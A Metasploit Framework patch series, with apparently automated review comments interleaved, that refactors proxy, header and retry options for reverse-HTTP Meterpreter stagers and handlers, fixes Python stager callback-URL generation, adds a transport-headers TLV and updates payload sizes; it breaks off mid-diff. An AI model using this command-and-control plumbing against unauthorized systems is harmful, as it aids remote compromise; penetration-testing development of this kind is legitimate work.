@@ -27,20 +27,12 @@ module Payload::Windows::ReverseHttp_x64 # def initialize(*args) super - register_advanced_options([ - OptInt.new('StagerURILength', [false, 'The URI length for the stager (at least 5 bytes)']), - OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails', 10], - aliases: ['ReverseConnectRetries']), - OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts', 5]), - OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort']), - OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser']), - OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass']), - OptEnum.new('HttpProxyType', 'The type of HTTP proxy (HTTP or SOCKS)', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), - OptString.new('HttpHeaderHost', 'An optional value to use for the Host HTTP header'), - OptString.new('HttpHeaderCookie', 'An optional value to use for the Cookie HTTP header'), - OptString.new('HttpHeaderReferer', 'An optional value to use for the Referer HTTP header') - ], self.class) + register_advanced_options( + [ OptInt.new('StagerURILength', 'The URI length for the stager (at least 5 bytes)') ] + + Msf::Opt::stager_retry_options + + Msf::Opt::http_header_options + + Msf::Opt::http_proxy_options + ) end def transport_config(opts={}) From 37ab771ca9d2fbc24c55da443cbb8ead997a161d Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 21 Sep 2017 03:02:13 -0500 Subject: [PATCH 176/254] uri is not always defined, fix python stager generation --- .../core/payload/python/meterpreter_loader.rb | 42 ++++++++++--------- 1 file changed, 22 insertions(+), 20 deletions(-) 
diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 7f4935bc4b..11cb72d6c7 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb 
@@ -105,28 +105,30 @@ module Payload::Python::MeterpreterLoader # The callback URL can be different to the one that we're receiving from the interface # so we need to generate it # TODO: move this to somewhere more common so that it can be used across payload types - uri = "/#{(opts[:uri].to_s == '' ? opts[:url] : opts[:uri].to_s).split('/').reject(&:empty?)[-1]}" - callback_url = [ - opts[:url].split(':')[0], - '://', - (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, - ':', - (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, - ds['LURI'].to_s, - uri, - '/' - ].join('') + unless opts[:url].to_s == '' + uri = "/#{opts[:url].split('/').reject(&:empty?)[-1]}" + callback_url = [ + opts[:url].to_s.split(':')[0], + '://', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLHOST'] : ds['LHOST']).to_s, + ':', + (ds['OverrideRequestHost'] == true ? ds['OverrideRequestLPORT'] : ds['LPORT']).to_s, + ds['LURI'].to_s, + uri, + '/' + ].join('') - # patch in the various payload related configuration - met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") - met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' - met.sub!('HTTP_COOKIE = None', "HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != '' - met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != '' - met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != '' + # patch in the various payload related configuration + met.sub!('HTTP_CONNECTION_URL = None', "HTTP_CONNECTION_URL = '#{var_escape.call(callback_url)}'") + met.sub!('HTTP_USER_AGENT = None', "HTTP_USER_AGENT = '#{var_escape.call(http_user_agent)}'") if http_user_agent.to_s != '' + met.sub!('HTTP_COOKIE = None', 
"HTTP_COOKIE = '#{var_escape.call(http_header_cookie)}'") if http_header_cookie.to_s != '' + met.sub!('HTTP_HOST = None', "HTTP_HOST = '#{var_escape.call(http_header_host)}'") if http_header_host.to_s != '' + met.sub!('HTTP_REFERER = None', "HTTP_REFERER = '#{var_escape.call(http_header_referer)}'") if http_header_referer.to_s != '' - if http_proxy_host.to_s != '' - proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" - met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'") + if http_proxy_host.to_s != '' + proxy_url = "http://#{http_proxy_host}:#{http_proxy_port}" + met.sub!('HTTP_PROXY = None', "HTTP_PROXY = '#{var_escape.call(proxy_url)}'") + end end # patch in any optional stageless tcp socket setup From 85acbadf01fe707be6a09a37da0f7c1a7c3d40e4 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 21 Sep 2017 03:05:03 -0500 Subject: [PATCH 177/254] more DRYing --- lib/msf/core/handler/reverse_https_proxy.rb | 11 ++++------- 1 file changed, 4 insertions(+), 7 deletions(-) diff --git a/lib/msf/core/handler/reverse_https_proxy.rb b/lib/msf/core/handler/reverse_https_proxy.rb index 1642460ad5..33269e20e2 100644 --- a/lib/msf/core/handler/reverse_https_proxy.rb +++ b/lib/msf/core/handler/reverse_https_proxy.rb 
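Review bot: The proxy URL assembled at the end of the hunk hard-codes the `http://` scheme and interpolates `http_proxy_port` without checking it, so an `HttpProxyType` of `SOCKS` is silently honoured as an HTTP proxy and an unset port yields `http://host:`. Guard on both values, `if http_proxy_host.to_s != '' && http_proxy_port.to_s != ''`, and either map the type into the scheme or reject SOCKS explicitly if the Python side cannot use it, rather than letting the setting pass unnoticed. Nesting the proxy block under `unless opts[:url].to_s == ''` also means no proxy is patched when no URL is present; if that is intended, a comment such as `# proxy settings only apply to the HTTP transport, so patch them together with the URL` would spare the next reader the question. The enclosing `stage_payload` starts and ends outside the hunk.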
@@ -39,13 +39,10 @@ module ReverseHttpsProxy register_options( [ OptAddressLocal.new('LHOST', "The local listener hostname", default: "127.0.0.1"), - OptPort.new('LPORT', "The local listener port", default: 8443), - OptString.new('HttpProxyHost', "The proxy server's IP address", required: true, default: "127.0.0.1", aliases: ['PayloadProxyHost']), - OptPort.new('HttpProxyPort', "The proxy port to connect to", required: true, default: 8080, aliases: ['PayloadProxyPort']), - OptEnum.new('HttpProxyType', 'The proxy type, HTTP or SOCKS', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType']), - OptString.new('HttpProxyUser', "An optional username for HTTP proxy authentication", aliases: ['PayloadProxyUser']), - OptString.new('HttpProxyPass', "An optional password for HTTP proxy authentication", aliases: ['PayloadProxyPass']) - ], Msf::Handler::ReverseHttpsProxy) + OptPort.new('LPORT', "The local listener port", default: 8443) + ] + + Msf::Opt::http_proxy_options, + Msf::Handler::ReverseHttpsProxy) register_advanced_options( [ From ea37196614476065efd3fd002a45573589608736 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Thu, 21 Sep 2017 08:27:58 -0500 Subject: [PATCH 178/254] use cooler names c/o @timwr, make options easier to grep --- lib/msf/core/opt.rb | 44 +++++-------------- lib/msf/core/payload/java/reverse_http.rb | 6 +-- .../core/payload/python/meterpreter_loader.rb | 6 +-- lib/msf/core/payload/python/reverse_http.rb | 6 +-- lib/msf/core/payload/transport_config.rb | 6 +-- lib/msf/core/payload/windows/reverse_http.rb | 6 +-- .../core/payload/windows/x64/reverse_http.rb | 6 +-- 7 files changed, 29 insertions(+), 51 deletions(-) diff --git a/lib/msf/core/opt.rb b/lib/msf/core/opt.rb index 3009710a1e..33e1beed32 100644 --- a/lib/msf/core/opt.rb +++ b/lib/msf/core/opt.rb 
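Review bot: Folding the handler's proxy options into `Msf::Opt::http_proxy_options` drops the `required: true` and the `127.0.0.1`/`8080` defaults that the removed `HttpProxyHost` and `HttpProxyPort` lines carried, yet a proxy is the whole point of `ReverseHttpsProxy`; a module using this handler now passes validation with no proxy configured and fails later at connect time. Keep host and port as mandatory, module-specific definitions and take only the optional type/user/pass entries from the shared set, as sketched below (this assumes the option objects expose their name via `name`, which should be confirmed). The `register_options` call is complete within the hunk but the enclosing `initialize` is not.
```ruby
register_options(
  [
    OptAddressLocal.new('LHOST', "The local listener hostname", default: "127.0.0.1"),
    OptPort.new('LPORT', "The local listener port", default: 8443),
    # a proxy is mandatory for this handler: keep host/port required with the previous defaults
    OptString.new('HttpProxyHost', "The proxy server's IP address", required: true, default: "127.0.0.1", aliases: ['PayloadProxyHost']),
    OptPort.new('HttpProxyPort', "The proxy port to connect to", required: true, default: 8080, aliases: ['PayloadProxyPort'])
  ] +
  # only the optional type/user/pass definitions come from the shared set
  Msf::Opt::http_proxy_options.reject { |opt| %w[HttpProxyHost HttpProxyPort].include?(opt.name) },
  Msf::Handler::ReverseHttpsProxy)
# … unchanged: register_advanced_options …
```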
@@ -59,8 +59,7 @@ module Msf # @return [OptEnum] def self.SSLVersion - Msf::OptEnum.new( - 'SSLVersion', + Msf::OptEnum.new('SSLVersion', 'Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate)', enums: self.ssl_supported_options ) @@ -68,14 +67,12 @@ module Msf def self.stager_retry_options [ - OptInt.new( - 'StagerRetryCount', + OptInt.new('StagerRetryCount', 'The number of times the stager should retry if the first connect fails', default: 10, aliases: ['ReverseConnectRetries'] ), - OptInt.new( - 'StagerRetryWait', + OptInt.new('StagerRetryWait', 'Number of seconds to wait for the stager between reconnect attempts', default: 5 ) @@ -84,29 +81,19 @@ module Msf def self.http_proxy_options [ - OptString.new( - 'HttpProxyHost', - 'An optional proxy server IP address or hostname', + OptString.new('HttpProxyHost', 'An optional proxy server IP address or hostname', aliases: ['PayloadProxyHost'] ), - OptPort.new( - 'HttpProxyPort', - 'An optional proxy server port', + OptPort.new('HttpProxyPort', 'An optional proxy server port', aliases: ['PayloadProxyPort'] ), - OptString.new( - 'HttpProxyUser', - 'An optional proxy server username', + OptString.new('HttpProxyUser', 'An optional proxy server username', aliases: ['PayloadProxyUser'] ), - OptString.new( - 'HttpProxyPass', - 'An optional proxy server password', + OptString.new('HttpProxyPass', 'An optional proxy server password', aliases: ['PayloadProxyPass'] ), - OptEnum.new( - 'HttpProxyType', - 'The type of HTTP proxy', + OptEnum.new('HttpProxyType', 'The type of HTTP proxy', enums: ['HTTP', 'SOCKS'], aliases: ['PayloadProxyType'] ) 
@@ -115,18 +102,9 @@ module Msf def self.http_header_options [ - OptString.new( - 'HttpHeaderHost', - 'An optional value to use for the Host HTTP header' - ), - OptString.new( - 'HttpHeaderCookie', - 'An optional value to use for the Cookie HTTP header' - ), - OptString.new( - 'HttpHeaderReferer', - 'An optional value to use for the Referer HTTP header' - ) + OptString.new('HttpHostHeader', 'An optional value to use for the Host HTTP header'), + OptString.new('HttpCookie', 'An optional value to use for the Cookie HTTP header'), + OptString.new('HttpReferer', 'An optional value to use for the Referer HTTP header') ] end diff --git a/lib/msf/core/payload/java/reverse_http.rb b/lib/msf/core/payload/java/reverse_http.rb index 297184e92d..a454191032 100644 --- a/lib/msf/core/payload/java/reverse_http.rb +++ b/lib/msf/core/payload/java/reverse_http.rb @@ -68,9 +68,9 @@ module Payload::Java::ReverseHttp c = '' c << "Spawn=#{ds["Spawn"] || 2}\n" c << "HeaderUser-Agent=#{ds["HttpUserAgent"]}\n" if ds["HttpUserAgent"] - c << "HeaderHost=#{ds["HttpHeaderHost"]}\n" if ds["HttpHeaderHost"] - c << "HeaderReferer=#{ds["HttpHeaderReferer"]}\n" if ds["HttpHeaderReferer"] - c << "HeaderCookie=#{ds["HttpHeaderCookie"]}\n" if ds["HttpHeaderCookie"] + c << "HeaderHost=#{ds["HttpHostHeader"]}\n" if ds["HttpHostHeader"] + c << "HeaderReferer=#{ds["HttpReferer"]}\n" if ds["HttpReferer"] + c << "HeaderCookie=#{ds["HttpCookie"]}\n" if ds["HttpCookie"] c << "URL=#{scheme}://#{ds['LHOST']}" c << ":#{ds['LPORT']}" if ds['LPORT'] c << luri diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 11cb72d6c7..5bb0143857 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb 
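Review bot: The rename of `HttpHeaderHost`, `HttpHeaderCookie` and `HttpHeaderReferer` to `HttpHostHeader`, `HttpCookie` and `HttpReferer` in the `@@ -115` hunk carries no `aliases:`, unlike the proxy options a few lines above which keep their `PayloadProxy*` names as aliases; resource scripts and saved configs that set the old names will now hit an unknown option (or be silently ignored, depending on how the datastore treats unregistered keys). Add the previous name to each line, e.g. `OptString.new('HttpHostHeader', 'An optional value to use for the Host HTTP header', aliases: ['HttpHeaderHost'])`, and the same for the cookie and referer entries. Every consumer renamed in this commit reads `ds['HttpHostHeader']` directly, so registration is the only place the alias is needed. The `http_header_options` method is complete within the hunk.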
@@ -98,9 +98,9 @@ module Payload::Python::MeterpreterLoader http_user_agent = opts[:http_user_agent] || ds['HttpUserAgent'] http_proxy_host = opts[:http_proxy_host] || ds['HttpProxyHost'] || ds['PROXYHOST'] http_proxy_port = opts[:http_proxy_port] || ds['HttpProxyPort'] || ds['PROXYPORT'] - http_header_host = opts[:header_host] || ds['HttpHeaderHost'] - http_header_cookie = opts[:header_cookie] || ds['HttpHeaderCookie'] - http_header_referer = opts[:header_referer] || ds['HttpHeaderReferer'] + http_header_host = opts[:header_host] || ds['HttpHostHeader'] + http_header_cookie = opts[:header_cookie] || ds['HttpCookie'] + http_header_referer = opts[:header_referer] || ds['HttpReferer'] # The callback URL can be different to the one that we're receiving from the interface # so we need to generate it diff --git a/lib/msf/core/payload/python/reverse_http.rb b/lib/msf/core/payload/python/reverse_http.rb index 30a0e34fe3..f0981c9796 100644 --- a/lib/msf/core/payload/python/reverse_http.rb +++ b/lib/msf/core/payload/python/reverse_http.rb @@ -28,9 +28,9 @@ module Payload::Python::ReverseHttp proxy_host: ds['HttpProxyHost'], proxy_port: ds['HttpProxyPort'], user_agent: ds['HttpUserAgent'], - header_host: ds['HttpHeaderHost'], - header_cookie: ds['HttpHeaderCookie'], - header_referer: ds['HttpHeaderReferer'] + header_host: ds['HttpHostHeader'], + header_cookie: ds['HttpCookie'], + header_referer: ds['HttpReferer'] }) opts[:scheme] = 'http' if opts[:scheme].nil? diff --git a/lib/msf/core/payload/transport_config.rb b/lib/msf/core/payload/transport_config.rb index 284347e1cb..7258561544 100644 --- a/lib/msf/core/payload/transport_config.rb +++ b/lib/msf/core/payload/transport_config.rb 
@@ -83,9 +83,9 @@ private def get_custom_headers(ds) headers = "" - headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] - headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] - headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] if headers.length > 0 headers diff --git a/lib/msf/core/payload/windows/reverse_http.rb b/lib/msf/core/payload/windows/reverse_http.rb index c5895d9f2a..db89b7138d 100644 --- a/lib/msf/core/payload/windows/reverse_http.rb +++ b/lib/msf/core/payload/windows/reverse_http.rb @@ -72,9 +72,9 @@ module Payload::Windows::ReverseHttp # def get_custom_headers(ds) headers = "" - headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] - headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] - headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] if headers.length > 0 headers diff --git a/lib/msf/core/payload/windows/x64/reverse_http.rb b/lib/msf/core/payload/windows/x64/reverse_http.rb index f31cf1ca24..d42d3497f2 100644 --- a/lib/msf/core/payload/windows/x64/reverse_http.rb +++ b/lib/msf/core/payload/windows/x64/reverse_http.rb 
@@ -77,9 +77,9 @@ module Payload::Windows::ReverseHttp_x64 # def get_custom_headers(ds) headers = "" - headers << "Host: #{ds['HttpHeaderHost']}\r\n" if ds['HttpHeaderHost'] - headers << "Cookie: #{ds['HttpHeaderCookie']}\r\n" if ds['HttpHeaderCookie'] - headers << "Referer: #{ds['HttpHeaderReferer']}\r\n" if ds['HttpHeaderReferer'] + headers << "Host: #{ds['HttpHostHeader']}\r\n" if ds['HttpHostHeader'] + headers << "Cookie: #{ds['HttpCookie']}\r\n" if ds['HttpCookie'] + headers << "Referer: #{ds['HttpReferer']}\r\n" if ds['HttpReferer'] if headers.length > 0 headers From fea28a89a5c1da39be035791d875c0b7126d24bd Mon Sep 17 00:00:00 2001 From: OJ Date: Wed, 4 Oct 2017 10:44:28 +1000 Subject: [PATCH 179/254] Fix TLV defs for http headers --- lib/rex/post/meterpreter/client_core.rb | 24 ++++++++++++++---------- lib/rex/post/meterpreter/packet.rb | 3 ++- 2 files changed, 16 insertions(+), 11 deletions(-) diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 69d509ef89..79132a548c 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb 
@@ -139,15 +139,16 @@ class ClientCore < Extension
       response.each(TLV_TYPE_TRANS_GROUP) { |t|
         result[:transports] << {
-          :url => t.get_tlv_value(TLV_TYPE_TRANS_URL),
-          :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
-          :retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
-          :retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
-          :ua => t.get_tlv_value(TLV_TYPE_TRANS_UA),
-          :proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
-          :proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
-          :proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
-          :cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH)
+          :url => t.get_tlv_value(TLV_TYPE_TRANS_URL),
+          :comm_timeout => t.get_tlv_value(TLV_TYPE_TRANS_COMM_TIMEOUT),
+          :retry_total => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_TOTAL),
+          :retry_wait => t.get_tlv_value(TLV_TYPE_TRANS_RETRY_WAIT),
+          :ua => t.get_tlv_value(TLV_TYPE_TRANS_UA),
+          :proxy_host => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_HOST),
+          :proxy_user => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_USER),
+          :proxy_pass => t.get_tlv_value(TLV_TYPE_TRANS_PROXY_PASS),
+          :cert_hash => t.get_tlv_value(TLV_TYPE_TRANS_CERT_HASH),
+          :custom_headers => t.get_tlv_value(TLV_TYPE_TRANS_HEADERS)
         }
       }
@@ -555,6 +556,7 @@ class ClientCore < Extension
       # We cannot migrate into a process that we are unable to open
       # On linux, arch is empty even if we can access the process
       if client.platform == 'windows'
+
         if target_process['arch'] == nil || target_process['arch'].empty?
           raise RuntimeError, "Cannot migrate into this process (insufficient privileges)", caller
         end
@@ -718,7 +720,8 @@ private
   # Get a reference to the currently active transport.
   #
   def get_current_transport
-    transport_list[:transports][0]
+    x = transport_list
+    x[:transports][0]
   end
   #
@@ -728,6 +731,7 @@ private
   def generate_migrate_stub(target_process)
     stub = nil
+
     if client.platform == 'windows' && [ARCH_X86, ARCH_X64].include?(client.arch)
       t = get_current_transport
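Review bot: The new `:custom_headers` entry in the transport hash will be `nil` for any transport group that carries no TLV_TYPE_TRANS_HEADERS, which is presumably what a Meterpreter built before this TLV existed will send, so consumers of `transport_list` have to treat a missing value as "no custom headers" rather than as a string. A comment on the added line would make that contract explicit, e.g. `# nil when the remote side does not report custom headers (older payloads)`. The enclosing method starts and ends outside the hunk.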
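Review bot: The rewrite of `get_current_transport` introduces a temporary named `x` that adds nothing over the one-liner it replaces; `transport_list[:transports][0]` already says everything the two new lines say. If the point is to keep a local for debugging or to avoid re-evaluating `transport_list`, give it a descriptive name, e.g. `transports = transport_list[:transports]` followed by `transports.first`; otherwise the original form is clearer. The two remaining hunks in this file add only blank lines.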
diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb
index a027e25233..35fb4b0da1 100644
--- a/lib/rex/post/meterpreter/packet.rb
+++ b/lib/rex/post/meterpreter/packet.rb
@@ -102,7 +102,8 @@ TLV_TYPE_TRANS_PROXY_USER = TLV_META_TYPE_STRING | 437
 TLV_TYPE_TRANS_PROXY_PASS = TLV_META_TYPE_STRING | 438
 TLV_TYPE_TRANS_RETRY_TOTAL = TLV_META_TYPE_UINT | 439
 TLV_TYPE_TRANS_RETRY_WAIT = TLV_META_TYPE_UINT | 440
-TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441
+TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 441
+TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 442
 TLV_TYPE_MACHINE_ID = TLV_META_TYPE_STRING | 460
 TLV_TYPE_UUID = TLV_META_TYPE_RAW | 461
From 40509856493bc36ad8194257cc8548e6209dfb1b Mon Sep 17 00:00:00 2001
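Review bot: Giving the new `TLV_TYPE_TRANS_HEADERS` the value 441 and moving `TLV_TYPE_TRANS_GROUP` to 442 changes the meaning of an id that was already assigned, so a payload built against the previous table will have its transport groups parsed as a string TLV and its headers as a group. Unless the payload side already defines the headers TLV as 441 (the subject line suggests the two definitions are being aligned, but that side is not visible here), appending is the compatibility-safe choice: keep `TLV_TYPE_TRANS_GROUP = TLV_META_TYPE_GROUP | 441` and add `TLV_TYPE_TRANS_HEADERS = TLV_META_TYPE_STRING | 442`. Either way, a comment next to the renumbered constant stating which metasploit-payloads release introduced the change would help whoever debugs a parse failure against an older binary.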
From: Brent Cook Date: Tue, 21 Nov 2017 13:53:33 -0600 Subject: [PATCH 180/254] update payloads --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- modules/payloads/singles/cmd/unix/reverse_nodejs.rb | 2 +- modules/payloads/singles/java/shell_reverse_tcp.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb | 2 +- .../singles/linux/mipsbe/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/nodejs/shell_reverse_tcp.rb | 2 +- modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_https.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/stagers/java/bind_tcp.rb | 2 +- modules/payloads/stagers/java/reverse_http.rb | 2 +- modules/payloads/stagers/java/reverse_https.rb | 2 +- modules/payloads/stagers/java/reverse_tcp.rb | 2 +- modules/payloads/stagers/windows/reverse_http.rb | 2 +- modules/payloads/stagers/windows/reverse_https.rb | 2 +- modules/payloads/stagers/windows/reverse_https_proxy.rb | 2 +- modules/payloads/stagers/windows/reverse_winhttp.rb | 2 +- 
modules/payloads/stagers/windows/reverse_winhttps.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_http.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_https.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_winhttp.rb | 2 +- modules/payloads/stagers/windows/x64/reverse_winhttps.rb | 2 +- 36 files changed, 37 insertions(+), 37 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index c20a197a6d..f83e37305d 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -17,7 +17,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.14) + metasploit-payloads (= 1.3.15) metasploit_data_models metasploit_payloads-mettle (= 0.2.5) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.14) + metasploit-payloads (1.3.15) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index b5909960ca..594a372aa0 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.3.14' + spec.add_runtime_dependency 'metasploit-payloads', '1.3.15' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.2.5' # Needed by msfgui and other rpc components diff --git a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb index 6622bbfef4..4b20b17172 100644 --- a/modules/payloads/singles/cmd/unix/reverse_nodejs.rb +++ b/modules/payloads/singles/cmd/unix/reverse_nodejs.rb 
@@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 3239 + CachedSize = 3231 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/java/shell_reverse_tcp.rb b/modules/payloads/singles/java/shell_reverse_tcp.rb index 4fa8c97d53..d87445f832 100644 --- a/modules/payloads/singles/java/shell_reverse_tcp.rb +++ b/modules/payloads/singles/java/shell_reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 7359 + CachedSize = 7544 include Msf::Payload::Single include Msf::Payload::Java diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb index d1749f9c25..3a5b484828 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_http.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1029776 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb index bc1d3f2c08..bc464ffbc7 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_https.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1029776 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb index cc021b9ff2..a01c6f9db5 100644 --- a/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb 
+++ b/modules/payloads/singles/linux/mipsbe/meterpreter_reverse_tcp.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/meterpreter_mipsbe_linux' module MetasploitModule - CachedSize = 1053924 + CachedSize = 1029776 include Msf::Payload::Single include Msf::Sessions::MeterpreterOptions diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb index 6cd4278eb5..dffa4838b1 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp.rb @@ -13,7 +13,7 @@ require 'msf/base/sessions/command_shell' module MetasploitModule - CachedSize = 805 + CachedSize = 803 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb index d2fa02fa4b..29cbe3588d 100644 --- a/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb +++ b/modules/payloads/singles/nodejs/shell_reverse_tcp_ssl.rb @@ -10,7 +10,7 @@ require 'msf/base/sessions/command_shell_options' module MetasploitModule - CachedSize = 833 + CachedSize = 831 include Msf::Payload::Single include Msf::Payload::NodeJS diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 3d097c72a7..f5e7303a36 100644 --- 